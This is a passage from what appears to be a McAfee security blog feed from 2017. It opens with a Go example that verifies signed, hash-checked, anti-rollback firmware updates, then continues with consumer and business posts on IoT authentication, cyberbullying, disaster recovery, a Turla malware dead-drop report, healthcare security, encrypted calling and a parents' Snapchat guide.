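// Manifest is what the vendor signs: the image version and the image hash.
// Signing a small manifest lets the device authenticate the update before
// it streams and hashes a possibly large image.
type Manifest struct {
	Version     uint32
	ImageSHA256 [sha256.Size]byte
}

// Bytes is the canonical encoding that is signed and verified.
func (m Manifest) Bytes() []byte {
	buf := make([]byte, 4+sha256.Size)
	binary.BigEndian.PutUint32(buf[:4], m.Version)
	copy(buf[4:], m.ImageSHA256[:])
	return buf
}

// SignedUpdate is the bundle that travels over the update channel.
type SignedUpdate struct {
	Manifest  Manifest
	Signature []byte
	Image     []byte
}

// Device holds the two pieces of state the checks depend on. Both must live
// where an attacker cannot change them (ROM/OTP for the key, a monotonic
// counter or secure element for the version), or the checks can be bypassed.
type Device struct {
	VendorPub ed25519.PublicKey // provisioned at manufacture
	Installed uint32            // version currently running
}

var (
	ErrBadSignature  = errors.New("manifest signature invalid")
	ErrImageMismatch = errors.New("image hash does not match manifest")
	ErrRollback      = errors.New("update version not newer than installed")
)

// ApplyUpdate checks authenticity (signature), integrity (hash) and
// anti-rollback (version) in that order and only then advances the installed
// version. Nothing is trusted about the channel that delivered the bundle: a
// compromised update server cannot produce a valid signature.
func (d *Device) ApplyUpdate(u SignedUpdate) error {
	if !ed25519.Verify(d.VendorPub, u.Manifest.Bytes(), u.Signature) {
		return ErrBadSignature
	}
	sum := sha256.Sum256(u.Image)
	if !bytes.Equal(sum[:], u.Manifest.ImageSHA256[:]) {
		return ErrImageMismatch
	}
	if u.Manifest.Version <= d.Installed {
		return ErrRollback
	}
	d.Installed = u.Manifest.Version
	return nil
}

// BuildUpdate is the vendor side: hash the image, fill in the manifest, sign it.
func BuildUpdate(priv ed25519.PrivateKey, version uint32, image []byte) SignedUpdate {
	m := Manifest{Version: version, ImageSHA256: sha256.Sum256(image)}
	return SignedUpdate{Manifest: m, Signature: ed25519.Sign(priv, m.Bytes()), Image: image}
}

// NewVendorKey derives a key pair from a 32-byte seed so the demonstration is
// deterministic (an assumption of this example). A real vendor key is generated
// once and kept in an HSM; only the public half ever reaches the device.
func NewVendorKey(seed []byte) (ed25519.PublicKey, ed25519.PrivateKey) {
	priv := ed25519.NewKeyFromSeed(seed)
	return priv.Public().(ed25519.PublicKey), priv
}

func main() {
	pub, priv := NewVendorKey(make([]byte, ed25519.SeedSize))
	dev := &Device{VendorPub: pub, Installed: 7}

	good := BuildUpdate(priv, 8, []byte("firmware v8 (constructed image bytes)"))
	fmt.Println("valid v8:       ", dev.ApplyUpdate(good), "installed =", dev.Installed)

	tampered := BuildUpdate(priv, 9, []byte("firmware v9"))
	tampered.Image = []byte("firmware v9 with a backdoor") // image swapped after signing
	fmt.Println("tampered image: ", dev.ApplyUpdate(tampered))

	fmt.Println("downgrade to v5:", dev.ApplyUpdate(BuildUpdate(priv, 5, []byte("firmware v5"))))

	otherSeed := make([]byte, ed25519.SeedSize)
	otherSeed[0] = 1
	_, otherPriv := NewVendorKey(otherSeed)
	fmt.Println("wrong key:      ", dev.ApplyUpdate(BuildUpdate(otherPriv, 9, []byte("firmware v9"))))
}
```

Three points follow from the code that the article only hints at. Encrypting the channel is not a substitute for the signature: TLS authenticates the update server, not the firmware, so a compromised server could still push a malicious image unless every image is signed with a key the server does not hold. The anti-rollback check is only as strong as the storage behind Installed; an attacker who can rewrite that counter can reinstall an old, validly signed image with a known vulnerability. And the public key must be immutable on the device, which in practice means ROM, fuses or a secure element rather than the same flash the firmware lives in.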

Reliable authentication is another important protection measure. It is still common to find devices connected to the Internet with no authentication at all.

This paves the way for spoofing: an attacker can impersonate a device to the server, or the server to the device. If such unauthenticated deployments become widespread, it will be possible to disable millions of devices at once. The danger is greatest when a server with millions of connected machines is compromised, because every device that trusts it unconditionally will follow its instructions.

To make intruders’ lives much harder, manufacturers need reliable certificate life-cycle management (issuance, renewal and revocation for every device identity) and a standardized, shared code base for the security functions. Both reduce the number of attack vectors.

Of course, securing the Internet of Things remains an arduous task as the industry is only groping its way. Currently, online criminals are only beginning to weigh the risks and assess the opportunities and potential profitability of the new market.

Meanwhile, manufacturers and users are not too concerned about the possible threat. Perhaps this will change quickly after the first successful incidents of rogue monetization of IoT vulnerabilities. Hopefully, we will have time to prepare.

This article was written by David Balaban from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Raise a United Voice Against Cyberbullying: Stop Cyberbullying Day
https://securingtomorrow.mcafee.com/consumer/raise-united-voice-cyberbullying-stop-cyberbullying-day/
Thu, 15 Jun 2017 16:13:39 +0000

What does Zoe Saldana have in common with Sonam Kapoor, other than the fact that they are both renowned actors? They have both faced bullying online. And due to the anonymity and sense of security offered by the internet, not just celebs but even ordinary people like you and I could be subjected to cyberbullying.

Isn’t it time we stand together to put an end to it and say ‘Stop Cyberbullying’?

The digital world offers everyone a chance to connect with people and voice their opinions. Unfortunately, some people misuse this privilege to harass others, and victims can suffer emotional distress or, in extreme cases, even lose their lives.

Our children are the first generation of digital citizens, and their posts and online actions often make them easy targets for bullies. As parents, we need to guide them on social media etiquette and explain the threats of the virtual world so that they can handle adverse situations.

Consider this:

  • According to the McAfee 2017 study “New Family Dynamics in a Connected World,” 49% of Indian parents have shown concerns about their child potentially interacting with a social predator or cybercriminal online.
  • The 2015 McAfee Teen Tween Technology report states that 43% of the children active on social media claim to have witnessed cruel behaviour on social networks. Almost one out of four (22%) of those active on social media claim to have been the victim of cyberbullying themselves.

Are parents aware of cyberbullying? The good news is yes, they are, and most of those surveyed said they have discussed this issue with their children and follow their children on their social media networks. Having said that, there are still many parents who do not believe in monitoring their kids online. Children, especially teens, are quite vulnerable and prone to peer influence. They need guidance on handling cyberbullying and parental support is paramount. A confident child will usually not seek attention or approval among strangers online.  Kids who are bullies also need counselling and guidance, further stressing the need for parental supervision.

Sharing a few tips on creating a safer and inclusive online environment:

  1. Choose your friends with care: it is easier for rude people and strangers to bully you. Be wary of accepting requests from strangers. Never give out your cell phone number or email address, and never reveal passwords, even to close friends.
  2. Mind what you share: what you say, and how you say it, makes a difference. Keep personal information private. If you do not use the privacy settings, your profile is open to anyone and everyone, which increases the chance of being bullied or of personal photos being downloaded and manipulated.
  3. Be positive and don’t react: losing your calm and reacting is exactly what cyberbullies want. Take measures only after careful deliberation.
  4. Ignore, block or unfriend those who provoke or humiliate you: block and report abusers using the ‘report abuse’ option. If the issue persists, ask your parents for help in resolving it.
  5. If you are cyberbullied, share your experience with people you trust: unburdening gets you good advice, and the support is invaluable for regaining emotional strength. Reach out to your parents or close peers at the first sign of bullying or conflict online.

Quick tips for parents to help them be on the top of things

Talk to your kids, frequently and frankly: This is THE most important thing to do to help you stay aware of what’s happening in your child’s virtual life and for them to feel free to confide in you. You can use role playing with real life situations to help kids learn how to respond to online bullies.

Monitor and mentor kids until they are mature enough to handle online issues on their own.

We are part of the #STOPCYBERBULLYINGDAY campaign because we are committed to a positive and all-inclusive culture in the virtual world. McAfee security solutions like McAfee Total Protection and McAfee LiveSafe offer a parental-control feature that helps parents monitor their kids remotely. This is an excellent way to monitor, guide and keep them safe online.

Raise a united voice against cyberbullying by joining a Twitter campaign on 16th June. Use the hashtag #STOPCYBERBULLYINGDAY to share your views, tips and stories on cyberbullying and mark your solidarity with the movement.

McAfee Public Cloud Server Security Suite Paid AMI Now on AWS Marketplace
https://securingtomorrow.mcafee.com/business/mcafee-public-cloud-server-security-suite-paid-ami-now-aws-marketplace/
Thu, 15 Jun 2017 16:00:06 +0000

A new Paid Amazon Machine Image (AMI) for McAfee Public Cloud Server Security Suite (McAfee PCS) is now available on an hourly basis on the Amazon Web Services (AWS) Marketplace. The Paid AMI is a flexible option for protecting AWS workloads since there’s no need to estimate usage and obtain a license before getting started.  You may want to explore McAfee PCS (Paid AMI) for AWS security if you:

  • Prefer an OpEx “pay-as-you-go” pricing model
  • Have spiky (variable) sizing and timing requirements for your workloads that are difficult to estimate
  • Want to test drive McAfee PCS before purchasing a license from McAfee.

With AWS, you are participating in a shared responsibility security model: AWS is responsible for securing the underlying infrastructure, and you are responsible for securing your workloads and configuring platform security. McAfee PCS provides visibility and protection to keep AWS deployments safe. Comprehensive protection starts at just $0.10 per hour.

Our new McAfee PCS PAID AMI is designed to help enterprise and government AWS customers quickly secure their Amazon workloads with foundational security consisting of:

  • Cloud workload discovery and monitoring
  • Antimalware
  • Host-based firewall
  • Host intrusion prevention.

Whitelisting, file integrity monitoring and change prevention are also available to help protect high-risk environments and meet regulatory compliance requirements. McAfee PCS protection scales elastically with your Amazon workloads for continuous protection.

[Screenshot: Cloud Workload Discovery provides end-to-end visibility into all cloud workloads]

What do I get from using McAfee PCS to protect AWS workloads?

  • Faster threat detection (as shown in the screen shot above) through insights into weak security controls for cloud workloads, unsafe firewall settings, unencrypted volumes and indicators of compromise such as suspicious traffic
  • Quick and easy remediation using McAfee ePolicy Orchestrator or your favorite DevOps tools such as Amazon OpsWorks, Chef, or Puppet
  • Defense against emerging and advanced threats with malware scanning and intrusion prevention
  • Protection from advanced persistent threats without requiring signature updates or labor-intensive list management
  • Prevention of change activity that can lead to security breaches, data loss, and outages
  • Easier achievement and demonstration of regulatory compliance

Get Started

Start at no cost with a free trial! Click here to visit the AWS Marketplace.

How to avoid a disastrous recovery
https://securingtomorrow.mcafee.com/business/optimize-operations/how-to-avoid-a-disastrous-recovery/
Wed, 14 Jun 2017 17:58:08 +0000

Every chief information officer worries about the health and resiliency of their data center and whether it can keep the business running in the event of a disaster. Many go as far as to hold periodic tests to discover and mitigate weaknesses.

Netflix has gone even further by introducing testing in the form of their Simian Army which randomly tests the resiliency of their production environment against all manner of failures. And though cloud computing has provided a wealth of options for ensuring business continuity in the event of natural or manmade interruptions, disaster recovery (DR) is your last line of defense when every business continuity procedure and plan fails.

With outages costing enterprises up to $60 million a year, according to IHS Markit, DR planning is a critical component of every data center plan, even if the data center is in the cloud.

Furthermore, there are now regulations that require companies to have a DR plan in place. For instance, the Federal Financial Institutions Examination Council (FFIEC) has guidelines about the maximum allowable downtime for IT systems based on how critical downtime is to the business. If a disaster arises and a company isn’t prepared for it, the company can face fines and legal penalties in addition to the loss of service, data, and customer good will.

The ultimate goal of DR planning is to move “cold” data, complete copies of the data center frozen at a point in time, to the most cost effective location possible that provides for meaningful SLA recovery if/when necessary. These copies are then constantly updated to ensure any subsequent changes to the production environment are replicated to the DR environment.

Before moving forward with DR planning, organizations must look at industry-specific regulations such as HIPAA or the Sarbanes-Oxley Act to determine the right hosting infrastructure for their data. For example, strict data sovereignty and security requirements prevent organizations from saving personal data to the cloud if that data leaves the country of residence at any time.

After evaluating these requirements, the CIO may well conclude that a hybrid cloud is the best option for that organization, both financially and in terms of risk. Where “cold” data was previously moved to tape for offsite storage, cloud-based cold storage provides cost-effective retention and quicker recovery in the event of a disaster.

Implementing a hybrid IT infrastructure where data is backed up to the cloud – private or public – enables IT to continue to control and align the appropriate levels of data performance, protection, and security across all environments. By replicating data to the cloud and/or other physical sites, organizations can quickly recover operations to that facility when a primary site outage occurs.

Even in the absence of natural disasters, one disaster that is wreaking havoc on sensitive enterprise data today is ransomware, malware that takes the victim’s data hostage until a ransom is paid. Organizations with backup/DR tooling as simple as snapshot management software can use it against ransomware as part of the DR plan.

The concept is rooted in user-driven data recovery: snapshots are read-only, so ransomware running on the host cannot encrypt or overwrite them. Snapshots are taken in the background, and because users have a point-in-time copy of their uncompromised data to restore from, there is no need to pay the criminals. The caveat is that snapshots are only as safe as the credentials that can delete them. An attacker who obtains storage-administrator access can remove the snapshots before encrypting the live data, so those credentials need to be tightly controlled and the retention policy enforced outside the reach of ordinary accounts.

These days it’s rarely a matter of if disasters will strike, rather when they will strike. Organizations must create and test a comprehensive DR plan to prevent the potential for lost productivity, reputation, and revenue for the business.

By understanding the threats to their data, taking compliance regulations into careful consideration and creating an all-encompassing DR strategy, organizations will be well positioned to quickly recover operations and avoid the consequences of downtime from any disaster.

This article was written by Mike Elliott from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Cybercriminals Test Malware Through a Comment on Britney Spears’ Instagram Page
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybercriminals-test-malware-through-a-comment-on-britney-spears-instagram/
Wed, 14 Jun 2017 16:52:00 +0000

Oops, Trojan malware did it again. This time, it’s targeting popstar Britney Spears’ social media, specifically, her Instagram page. However, the Toxic singer wasn’t the victim of the attack, as her popularity was leveraged to help conduct the scheme (she made our Most Dangerous Celebrities list back in 2014). The Trojan malware, which was created by a well-known hacking group named Turla, actually made its way into the comment section of the princess of pop’s Instagram in the hope of potentially tricking innocent users.

So, how exactly does this ploy work? The malware, a backdoor delivered as a fake Firefox extension, scrolls through the comments on Spears’ photos looking for one that produces a specific hash value. That comment is not there to lure readers; it is a dead drop. From it the malware derives a bit.ly short link that tells it where to go next, which lets the attackers move their infrastructure simply by posting a new comment. To a human the comment looks a little odd, but most people would take it for ordinary spam. Anyone who does click the link lands on a site known to be the hacking group’s “watering hole.”

The good news is that experts believe this was only a test by the group. Still, it reminds us that cybercriminals are getting creative with how they leverage social media to conduct attacks, and that one malicious link can direct users to scams or unsafe corners of the internet.

Therefore, to avoid malicious links and to ensure you use social media safely, follow these tips:

-Be careful what you click. Whether it’s a link in the comments section of Instagram or a site sent from an unknown email, it’s crucial you’re always wary of clicking on unknown links. These links can carry malware, or redirect you to a malicious site. So, if a link doesn’t come from someone you know, it’s best to just err on the side of caution and avoid clicking all together.

-Secure your own social media. Reduce your chances of being hit with malware by locking down your own personal social media accounts. Spears’ account was leveraged by cybercriminals because her account is public, so always remember to change your social media account settings to private whenever possible. That way, you can control who can friend you and comment on your pictures.

-Use a comprehensive security solution. Whether you’re scrolling through Instagram on your phone or skimming Facebook on your laptop, ensure all of your devices are protected from cyberattacks by using a comprehensive security solution like McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

Health providers need new security focus to protect patient data https://securingtomorrow.mcafee.com/business/safeguard-data/health-providers-need-new-security-focus-to-protect-patient-data/ Tue, 13 Jun 2017 23:20:50 +0000 https://securingtomorrow.mcafee.com/?p=75061 Incidents of cyber attacks against medical devices are inevitable, and healthcare providers are not prepared for the eventuality. In fact, in general, healthcare organizations are focusing all their efforts on protecting the wrong thing. Keeping patients safe should dictate providers’ security efforts, but healthcare organizations are more likely to take steps that protect data so …

The post Health providers need new security focus to protect patient data appeared first on McAfee Blogs.

Incidents of cyber attacks against medical devices are inevitable, and healthcare providers are not prepared for the eventuality. In fact, in general, healthcare organizations are focusing all their efforts on protecting the wrong thing.

Keeping patients safe should dictate providers’ security efforts, but healthcare organizations are more likely to take steps that protect data so they can meet HIPAA requirements, said presenters last week at a security session at the annual meeting of the Society for Imaging Informatics in Medicine.

“Threats to patients and patients’ health are becoming more real,” says James Whitfill, MD, chief medical officer for Innovation Care Partners, a provider organization in Arizona.

The recent WannaCry ransomware attack helped to show the vulnerability of radiology equipment and other devices, Whitfill says. The attack encrypted Bayer MedRad devices at two U.S. healthcare organizations; the devices are power injector systems that monitor contrast agents that improve the quality of imaging scans.

“As providers, we should be concerned with actual patient health, not just protected health information (PHI),” Whitfill says. “We need to be making a shift from not worrying about policies and procedures to when our patients might be targeted by potentially harmful events.”

Research has already shown that insulin pumps and infusion devices could be compromised, but cyber attackers might also be able to exploit systems that influence patient care, such as computerized provider order entry and pharmacy systems. “What happens if someone gets into those systems that destroys inventory, changes records of patients’ allergies?” Whitfill says. “Or with surgical systems, what if an attack damages equipment? There are a lot of potential threats here that could cause harm or death to patients.”

Provider security efforts need to take a fresh look at what attackers are looking to achieve, says Ted Harrington, executive partner for Independent Security Evaluators, a research firm that has taken an intensive look at security practices in healthcare.

“We look at things from the perspective of the adversary,” Harrington says. “A lot of security in healthcare is focused on compliance. WannaCry demonstrated that there are some real security issues in healthcare and other industries as well. Ransomware is not just a data issue – it does inhibit the ability to access data, but it is fundamentally a patient care issue.”

Harrington believes healthcare organizations need to refocus security efforts on protecting patient health, evolving away from a pure focus on protecting data that helps them to comply with HIPAA statutes.

“Protecting patient data alone is insufficient to protect patient health,” he says. “For example, if you could attack something that could influence the way a physician behaves (such as information systems), that could compromise patient health. Some information systems are well protected, but there are so many different ways that someone could work his way through these layers of defense without even touching the things that are well protected.”


This article was written by Fred Bazzoli from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

We’ve Mastered Encrypted Messaging, So Are Encrypted Calls Next? https://securingtomorrow.mcafee.com/consumer/mobile-security/encrypted-calling/ https://securingtomorrow.mcafee.com/consumer/mobile-security/encrypted-calling/#respond Tue, 13 Jun 2017 13:00:56 +0000 https://securingtomorrow.mcafee.com/?p=74997 We’ve all heard the names before – WhatsApp, Viber, Telegram, Wire, Signal, Allo… with so many cyberattacks in the news recently, people have begun to rely on encrypted messaging apps to protect their privacy from potential hackers. These services secure end-to-end connections using varying tactics and levels of encryption – you may find yourself questioning …

The post We’ve Mastered Encrypted Messaging, So Are Encrypted Calls Next? appeared first on McAfee Blogs.

We’ve all heard the names before – WhatsApp, Viber, Telegram, Wire, Signal, Allo… with so many cyberattacks in the news recently, people have begun to rely on encrypted messaging apps to protect their privacy from potential hackers. These services secure end-to-end connections using varying tactics and levels of encryption – you may find yourself questioning what any of that means. How do you encrypt your messages? Can anyone do it? What is being protected when you use an encrypted messaging system? If encrypted messaging is so great, why isn’t everyone using encrypted messages? It sure could put an end to all the celebrity phone hacks and government information leaks… Here’s what you should know about encryption, along with answers to all of these questions.

When people encrypt their communications, it means that only the sender and the recipient can read one another’s messages. While the message is in transit, it cannot be decoded or unraveled by outsiders or by the maker of the application, which allows for privacy and security. Some apps do this by protecting individual messages sent to and from the device, some have encryption built in, and others offer a “secret” mode that can be switched on and off. Certain apps, namely Wire and Signal, encrypt messages by design: once you install and sign into the app, all communications are automatically encrypted.

People use encryption for all kinds of communication – for a long time, these apps could only offer encryption for text-based chat, but introducing encrypted calls has been a natural next step and an additional layer of protection in today’s digital world. Encrypted calls would be highly valuable, with the ability to thwart any snooping. However, developing the technology to create such protection for voice calls has proven difficult for programmers.

One of the main challenges that developers face is mastering internet-based calls, which still are not the most reliable way to communicate. Wi-Fi or Ethernet connections are the most stable, but many people still use cellular data to make VoIP (or Voice Over Internet Protocol) calls. In 2014, Signal, one of the many platforms offering encrypted communication, began to offer encrypted calling despite the complications with dropped calls and connection reliability, as did Wire. When WhatsApp introduced encrypted calls and video chat to their one billion users in 2016, other secure messaging apps finally began to pick up the pace and develop secure calling services of their own.

So, now that both encrypted texting services and encrypted calling services have been developed, it seems like all of our calls and texts should be secured by encryption, no questions asked. However, there are many factors slowing down adoption among potential users, one of the main reasons being that both parties must be using the same system for end-to-end encryption to function. Think about it this way – you may find an app that you love to use, but it might be difficult to convince all your friends and family to go through the steps to downloading and using the new app regularly. Everyone has their preferences, and getting everyone in your life to be on the same page can be difficult. Now, expand that to everyone in their lives – and so on, and so forth.

The resolution to this particular problem would be to fully open source these encryption products, so that people can communicate securely across different interfaces and applications. Developers can implement this by standardizing on a common end-to-end encryption protocol, so that products could speak to each other. While some small companies have adopted the Open Secure Telephony Network, or “OSTN,” many of the larger names in encryption – like Skype, Google, and Apple – have decided to brave the world of secure communication on their own, and forego open sourcing (much to the chagrin of people who need complete and total security). The potential security flaws with open-source code can be reason enough for these larger companies to keep their communications protocols private, which defeats the whole purpose. Until developers find the right solution, what’s the best way to keep your private communications safe?

  • Avoid Risky Wi-Fi. Don’t trust unsecured Wi-Fi networks when sending personal information. While it’s great in theory that Wi-Fi is almost always readily available, those unsecured networks are an easy target for hackers to gain access to hundreds of personal devices. If you send personal information over an open network, you don’t know who could be spying on your device – or who could be sharing your data.
  • Keep Your Secrets to Yourself. Generally, it’s a good idea to keep any super sensitive data off mobile devices and messaging apps. Besides not knowing who might be spying on your phone, devices can get lost or stolen, and physically broken into. There are many ways your data can be stolen from a phone, but if you never keep it there in the first place, you’re much more likely to keep it secure.
  • Security Software Goes a Long Way. I highly recommend trusting security software to have your back as a last resort. McAfee Mobile Security, which is free for Android and iOS, will warn you if you’re about to connect to an unsecured Wi-Fi network. That way, you’ll be more cautious if you are about to send any personal information over your phone.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

Unplugging: How Small Tech Shifts Can Make a Big Impact on a Family Vacation https://securingtomorrow.mcafee.com/consumer/family-safety/how-small-technology-shifts-can-make-a-huge-impact-on-your-family-vacation/ https://securingtomorrow.mcafee.com/consumer/family-safety/how-small-technology-shifts-can-make-a-huge-impact-on-your-family-vacation/#respond Tue, 13 Jun 2017 12:00:45 +0000 https://securingtomorrow.mcafee.com/?p=74773 The smartphone is the one item that automatically ignites an inner struggle as we pack for that long-awaited family vacation. On the one hand, we know we’d be trailblazers destined for an unforgettable family vacation if we “accidentally” left our phone on the bed and took off. On the other hand, that little glowing device …

The post Unplugging: How Small Tech Shifts Can Make a Big Impact on a Family Vacation appeared first on McAfee Blogs.

The smartphone is the one item that automatically ignites an inner struggle as we pack for that long-awaited family vacation.

On the one hand, we know we’d be trailblazers destined for an unforgettable family vacation if we “accidentally” left our phone on the bed and took off. On the other hand, that little glowing device is trip central. It houses our itinerary, maps, boarding passes, medical information, instant bank account access, and frankly, the best doggone camera most of us have ever owned.

For most of us, our relationship with our smartphone is one that will likely never move beyond the “it’s complicated” phase — especially when it comes to the unplugging conversation.

As parents, we all nod in agreement when given the litany of good reasons to unplug on vacation.

We all need to get our faces out of our phones and onto each other.
Family time comes first.
We can’t get this precious time back.
The benefits of unplugging outweigh the drawbacks (uh…right?).

Survey: More Travelers Unplugging

According to a recent McAfee study, more and more travelers are acting on their desire to unplug and experience the direct benefits of disconnecting.

An impressive 81% of individuals reported they unplugged on vacation in the past year and felt that their vacation was more enjoyable because of it.

The Family Factor

Most parents — 51% according to the survey — believe that devices should take a back seat on vacation. Still, the survey revealed that 77% of parents allow their children to use devices while traveling and 73% monitor device usage. Of the devices people are most comfortable leaving at home on vacation, 72% opted for laptops, 27% said phones, and 6% said they were unwilling to leave any device behind.

The top reasons individuals unplugged on vacation:

  • 69% to be in the moment
  • 65% to relieve stress
  • 44% to take a break from work
  • 36% out of respect for those around them

To know that the world won’t stop if we unplug, that our stress will go down, and that our family relationships and fun will simultaneously rise, sounds heavenly, right?

So why don’t even more of us simply unplug? What are we so afraid of?

As a well-intentioned parent who’s been at this for a while, I’ve noticed a self-defeating pattern that may help answer that question.

It all comes down to balance.

We can’t find balance as parents (and families) because we are striving for perfection, comparing ourselves to others and aiming for impossible standards. So many of our best parenting goals get sidelined because we fail to make balance an integral part of any important change.

~ ~ ~

Your reasoning might sound like this:

We tried to unplug on our vacation, which lasted about two hours. We have no discipline so why even try?

We unplugged for two days, and everyone nearly ripped each other’s heads off. Unplugging is not a good idea for our family.

I can’t tell the kids to unplug because I can’t unplug. It is what it is. I have to stay connected for emergencies (and Solitaire).

We connected over dinner, and that was good enough. Unplugging is not worth the fight. It’s just easier letting everyone do what he or she wants to do.

~ ~ ~

In these scenarios (anyone nodding yet?) there’s absolutely no balance. It’s black-and-white thinking, and it does nothing to bring about positive changes that move us closer to our goal of quality time.

So how about, on this family vacation, you strive for balance over perfection when it comes to unplugging?

You might be surprised at how a few small shifts can make some pretty significant differences in the quality of time you spend together.

Five ways to enjoy a ‘less-tech’ vacation

Define balance. The first step in successfully unplugging might be to define balance. Balance, according to the dictionary is “a state in which opposite forces are equal and placed in correct proportion.”

What balance means to your family in the context of unplugging is this: Unplug appropriately, not entirely. (Whew – did anyone else just feel the weight lift?) Or, opt for less tech over no tech. Everything-or-nothing thinking says, “Unplug 100%,” while a more balanced approach might be, “Let’s unplug for the next six hours as we explore the caves and give ourselves 30 minutes tonight after dinner to check our phones.”

Agree (together) on tech-free zones. Together, discuss and establish what you want your less-tech vacation to look like. If connecting during family meals is important to you, then agree as a family to unplug for all meal times while on vacation. If Bobby needs his YouTube on the six-hour plane ride, then that may be part of the plan. If Beth needs to text her boyfriend each night for 30 minutes, then that may be an important addendum to keep everyone happy. Remember: Progress is more important than perfection when it comes to unplugging and making necessary compromises as a family.

Make unplugging fun. Depending on the age of your kids, unplugging may seem like a punishment. You need only point out a dinosaur fossil, and younger kids will forget about their phones. Teens, however, may require a little more coaxing to unplug. So make it fun. Play a game. For every full day spent unplugged, let your child choose a fun activity like collecting shells or time at an arcade. If mom’s the tech addict, then promise a pedicure or an extra-long nap. For the email-addicted Dad, maybe unplugging for the day means extra fishing or hammock time — uninterrupted, of course.

Adjust settings, delete apps. Change your phone settings to reduce distractions. Turn off: 1) push notifications, 2) the Wi-Fi locator, and 3) email and emergency alerts. Delete: all social media phone apps. That’s right, delete. Why not? There’s no reason to be checking social media when you are on vacation, and posting your photos while out of town just isn’t wise. Deleting the social media apps from your phone does not delete your accounts; you can download them again when you get home. Encourage your kids to do the same, while still allowing them to text and check in with close friends if needed.

The 10-minute rule. Hey, any habit is tough to break. So, when you feel the urge to fire up your tech on vacation, give yourself 10 minutes before doing so and replace that urge with an alternate activity. Jump in the ocean, take a walk, pick up a book, meditate, journal, play a game, or browse local shops. If you are on a road trip, play a game with your family or strike up a great conversation. Here are a few conversation starters for those long road trips to help you out.

What are some things your family does to make it easier to unplug while on vacation? Please share your wisdom!


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The 5-Minute Parents’ Guide To Snapchat https://securingtomorrow.mcafee.com/consumer/family-safety/5-minute-parents-guide-snapchat/ https://securingtomorrow.mcafee.com/consumer/family-safety/5-minute-parents-guide-snapchat/#respond Tue, 13 Jun 2017 07:13:41 +0000 https://securingtomorrow.mcafee.com/?p=73679 OK – we’ve all heard about Snapchat and know that our kids love it. But how many of us really know how it works? Well, read on. I’ve put together a 5-minute overview that will get you up to speed ASAP. So strap yourself in and let’s get our heads around this together. What Is …

The post The 5-Minute Parents’ Guide To Snapchat appeared first on McAfee Blogs.

OK – we’ve all heard about Snapchat and know that our kids love it. But how many of us really know how it works? Well, read on. I’ve put together a 5-minute overview that will get you up to speed ASAP. So strap yourself in and let’s get our heads around this together.

What Is Snapchat?

Snapchat is essentially a messaging app that’s very much designed for capturing life in the moment. Users send fun and spontaneous texts, photos or videos that all disappear after a short period of time. Anything that is sent is referred to as a ‘Snap’. Snaps can be sent to one or more friends.

Now a Snap doesn’t just have to be a Snap. It can be dressed up with text, emojis and doodles (free-form drawings). One can also add filters, lenses and stickers to make Snaps more visually appealing. Geofilters are a particularly popular way to customise Snaps at specific locations and events worldwide. You can even create one for your own event. In fact, my boys inform me that they are essential for anyone having an 18th or 21st birthday party!

One of the biggest differences between Snapchat and its cousins Facebook and Instagram is that there is no ‘Like’ option on Snapchat. This is because Snaps are designed to disappear.

How Big Is Snapchat?

According to the latest available stats there are 158 million daily users on Snapchat, with 2.5 billion Snaps sent every day. It is the 5th most used social media site in Australia, with 1 in 6 Aussies using it daily. So it’s worth investing some time in!

How Old Do You Need To Be To Use It?

Like most social media platforms, the ‘legal’ age of use for Snapchat is 13, a by-product of US legislation called the Children’s Online Privacy Protection Act (COPPA). The legislation came into effect in 2000 and is unapologetically committed to giving parents control over what information is collected from their children online.

Now while this legislation is US-based, websites hosted overseas must comply with COPPA if they are directed to children in the US. In effect, if your kids are visiting the same sites that US kids would frequent, then COPPA applies.

However, parenting experts and even the OECD believe that this decision is really best left up to the parents, who should factor in a child’s maturity, resilience and level of responsibility before giving the green light or not, irrespective of age.

Isn’t It Used For Sexting?

When Snapchat first hit our screens in 2011 it was instantly pigeon-holed as a haven for sharing raunchy pictures. Since then it has broadened its offering and now competes in the mainstream social media space alongside apps such as Kik, WhatsApp and Facetime.

However, it still CAN absolutely be used for sexting so please don’t think it is all sunshine and smiles!

How To Interact On Snapchat?

Just like Facebook, when you start out on Snapchat you ‘friend’ people you know. Once you’re established friends, you can then share Snaps. However, there is a ‘follow’ option which allows users to follow celebrities and sporting teams. One of my boys says this can provide great content to on-share with friends!

I’ve Heard Of Stories – What Are They?

Users can compile their Snaps into a Story which has a 24-hour life. This could be a video, one Snap, or hundreds of Snaps. When a Snap is taken, users have the option of adding it to their Story.

Live Stories are a montage of Snaps submitted by Snapchatters from events around the world such as a concert or sporting event.

Is There A Messaging Option On Snapchat?

One-on-one chat is an option on Snapchat. Just like Snaps, chats are cleared when the recipient leaves the chat screen. But be aware – users can choose to save messages they would like to keep.

What’s Snapcash?

In 2014 Snapchat introduced a person-to-person payment feature that allows users to transfer money between themselves easily. Currently this is only available to US users over 18. So no need to worry about this in Australia yet. Phew!

What Do I Need To Tell My Kids?

Here are my top tips for helping your kids use Snapchat safely.

Saving Snaps

Even though Snaps technically disappear, there are a few ways they can remain permanent: the creator could save the Snap before sending it; the viewer could take a screenshot; or anyone could take a picture of the screen with another camera, or use another tool or app to save a copy. So, it is imperative your kids understand to never send anything illegal or that could get themselves or others into trouble. In an ideal world they wouldn’t do this, but sometimes you have to keep the conversation real!

Privacy Settings

The default ‘My Friends’ setting only allows users to send and receive media from users they have added to their Friends list. I highly recommend that anyone under the age of 18 continue with the setting. Check out this link if you need more help.

Personal Information

Just like any activity on social media, sharing personal information such as phone numbers, home address, name of school or parents’ details could have devastating consequences such as identity theft or even stalking. Please ensure your kids know how to keep their info tight.

Stick to Real Friends

As on all social media platforms, there are ways on Snapchat for your kids to find people they don’t know – and vice versa. Ensure your kids know that it is not OK to meet up with people they meet online. Online-only friends are NOT real friends!

Nudity

I know this might be an embarrassing conversation but you need to have it. Your kids need to know that exchanging nude or explicit images of anyone under the age of 18 – including themselves – is a serious crime. In most states of Australia, anyone caught and charged could be placed on the Sex Offenders Registry. So please ensure they truly understand the consequences here.

Problems

